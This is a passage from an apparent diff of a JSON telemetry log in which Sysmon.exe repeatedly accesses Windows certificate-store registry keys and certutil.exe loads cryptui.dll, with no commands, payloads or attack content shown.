"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
- "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cryptui.dll", - "image_path": "C:\\Windows\\System32\\cryptui.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software 
Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 